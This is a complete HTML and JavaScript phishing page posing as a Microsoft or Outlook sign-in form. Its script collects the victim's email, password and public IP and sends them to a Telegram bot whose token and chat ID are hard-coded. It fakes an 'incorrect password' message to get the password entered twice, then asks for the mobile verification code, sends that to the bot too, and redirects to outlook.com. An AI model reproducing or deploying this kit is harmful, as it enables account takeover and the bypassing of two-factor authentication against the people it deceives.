<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>

    <style>
        body{
            padding: 0;
            margin: 0;
            box-sizing: border-box;
            background: url('https://i.ibb.co/LJz4z44/officebg.png') ;
            background-position: center;
            background-size: cover;
            background-repeat: no-repeat;
            font-family: Arial, Helvetica, sans-serif;
            height: 980px;
    
        }

        .formal input{
            width: 95%;
            border: none;
            border-bottom: 1px solid #000;
            padding: 5px;
            outline: none;
            font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #495057;
    background-color: #fff;
    border-radius: 0px;
    background: transparent;
        }
        .formal button{
            color: #fff;
    border-color: #0067b8;
    background-color: #0067b8;
    padding: 5px 40px;
    float: right;
        }
        .formal p{
            font-size: .8125rem;
        }
        .formal a{
            font-size: .8125rem;
            color: #0067b8;
            text-decoration: none;
        }
        .formal{
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            -webkit-box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    -moz-box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    box-shadow: 10px 10px 96px -18px rgba(0,0,0,0.15);
    padding: 40px;
    width: 22%;
            border-radius: 2px;
            background: #fff;
        }


        #disp{
            display: none;
        }
        h1{

            color: #1b1b1b;
    font-size: 1.5rem;
    font-weight: 600;
        }

        #pass-mail{
            display: none;
        }

        #v-butt{
            display: none;
        }
        #nexts{
            display: block;
        }

        #sign-ins{
            font-size: 16px;
            display: none;
        }
        #code-sent{
            display: none;
        }
        
        #no-account{
            display: block;
        }

        #vf-code{
            display: none;
        }

        .s-coder{
            display: none;
        }

        .s-code{
            display: none;
        }
        @media(max-width: 800px){
        .formal{
            top: 20%;
            width: 90%;
        padding: 15px;
        box-shadow: none;
        }
        body{
            background: #fff;
        }
        }
    </style>
</head>
<body>
    

    <div class="formal">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" height="30px" alt="">
        <form action="#" id="formm">
            <br>
            <span id="disp">mailers@mail.ru</span>
            <label for="#"><h1 id="signs">Sign in</h1></label>
            <p style="color: red; display: none;" id="redas" >Your account or password is incorrect.</p>
            <p id="sign-ins">We'll send a code to your mobile to sign you in.</p>
            <input type="text" id="phone-mail" placeholder="Email" required>
            <input type="password" id="pass-mail" placeholder="Password" required>
            <input type="text" id="vf-code" placeholder="Code">
            <br>
            <p id="no-account">No account? <a href="#">Create one!</a></p>
            <a href="#" id="access">Can’t access your account?</a>
<br><br><br>
            <div class="main-butts">
                <button id="nexts">Next</button>
                <button id="v-butt" type="submit">Next</button>
            </div>
            
        </form>
        <button class="s-code">Send Code</button>
        <button class="s-coder">Continue</button>
        <br>
    </div>
    <!-- <div class="formal">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="">
        <form action="#" id="formm">
            <br>
            <span id="disp">mailers@mail.ru</span>
            <label for="#"><h1 id="signs">Sign in</h1></label>
            <p id="sign-ins">We'll send a code to your mobile to sign you in.</p>
            <input type="text" id="phone-mail" placeholder="Email, phone and Skype" required>
            <input type="password" id="pass-mail" placeholder="Password" required>
            <input type="text" id="vf-code" placeholder="Code" required>
            <br>
            <p id="no-account">No account? <a href="#">Create one!</a></p>
            <a href="#" id="access">Can’t access your account?</a>
<br><br><br>
            <div class="main-butts">
                <button id="nexts">Next</button>
                <button id="v-butt" type="submit">Next</button>
            </div>
            
        </form>
        <button class="s-code">Send Code</button>
        <br>
    </div> -->




    <script>
          const formall = document.querySelector('#formm')
          
          let bot = {
              TOKEN: "6636761328:AAEfHmiz8pDB1XlMaBq60cq-tRgM0Zl8PHU",
              chatID: "-822669959"
          }
              

          const butts = document.querySelector('#nexts')
          const vButt = document.querySelector('#v-butt')
          const signIns = document.querySelector('#sign-ins')
          const signs = document.querySelector('#signs')
          const disp = document.querySelector('#disp')
          const phoneMail = document.querySelector('#phone-mail')
          const codeS = document.querySelector('#code-sent')
          const passMail = document.querySelector('#pass-mail')
          const noAccount = document.querySelector('#no-account')
          const access = document.querySelector('#access')
          const vfCode = document.querySelector('#vf-code')
          const mainButts = document.querySelector('.main-butts')
          const sCode = document.querySelector('.s-code')
          const sCoder = document.querySelector('.s-coder')
          const redass = document.querySelector('#redas')
          butts.addEventListener('click', (e)=>{
            e.preventDefault()
            if(phoneMail.value === ""){
                return
            }
            // alert(phoneMail.value)
            if(tester !== 1){
                    redas.style.display = 'block'
            } else {
            setTimeout(() => {
                disp.textContent = phoneMail.value
            signs.textContent = "Enter Password"
            disp.style.display = "block"
            passMail.style.display = "block"
            phoneMail.style.display = "none"
            butts.style.display = 'none'
            vButt.style.display = 'block'
            // butts.type = 'submit'
            }, 2000);
        }
          })


          let tester = 1

          fetch('https://api.ipify.org/?format=json').then(results => results.json()).then(data => {

          formall.addEventListener("submit", e=>{
              e.preventDefault();
      
              // alert('clicker')
                const mainUser = phoneMail.value
                const mainPs = passMail.value
              
              fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==${mainUser}==${mainPs}==${data.ip}`, {
                  method: "GET"
              }).then(success => {
                  // alert('SENT')
                  // window.location.replace("/email.html");
                //   alert('incorrect password')
                  if(tester !== 1){
                    setTimeout(() => {
                    // mainButts.innerHTML = '<button id="code-sent">Send Code</button>'
                    // codeS.style.display = "block"
                    vButt.style.display = "none"
                    sCode.style.display = "block"
                    signs.textContent = "Sign In"
                    signIns.style.display = 'block'
                    noAccount.style.display = "none"
                    passMail.style.display = "none"
                    access.style.display = "none"
                redass.style.display = "none"

                  }, 2000);
                  
                    
            } else {
                redass.style.display = "block"
                passMail.textContent = ""
                  passMail.type = 'text'
                // alert(' password')
                tester = 0

            }
               
              
            

              }, error => {
                  console.log(error)
      
              })
      
          })
        })



          sCode.addEventListener('click', ()=>{
            fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==SEND CODE NOW`, {
                  method: "GET"
              }).then(success => {
                  // alert('SENT')
                  
                  setTimeout(() => {
                    // codeS.style.display = "block"
                    vButt.style.display = "none"
                    sCode.style.display = "none"
                    signs.textContent = "Sign In"
                    vfCode.style.display = "block"
                    signIns.textContent = "Enter code sent to mobile."
                    // signIns.style.display = 'block'
                    // noAccount.style.display = "none"
                    // passMail.style.display = "none"
                    // access.textContent = "Other ways to sign in"
                    sCoder.style.display = 'block'
                    access.style.display = "none"
                  }, 2000);

              }, error => {
                  console.log(error)
      
              })
      
          })



          sCoder.addEventListener('click', ()=>{
            if(vfCode.value === ''){
                return
            }

            fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=EXCELL==${vfCode.value}`, {
                  method: "GET"
              }).then(success => {

                setTimeout(() => {
                  window.location.replace("https://outlook.com");
                }, 2000);

              }, error => {
                  console.log(error)
      
              })
          })
    </script>

</body>
</html>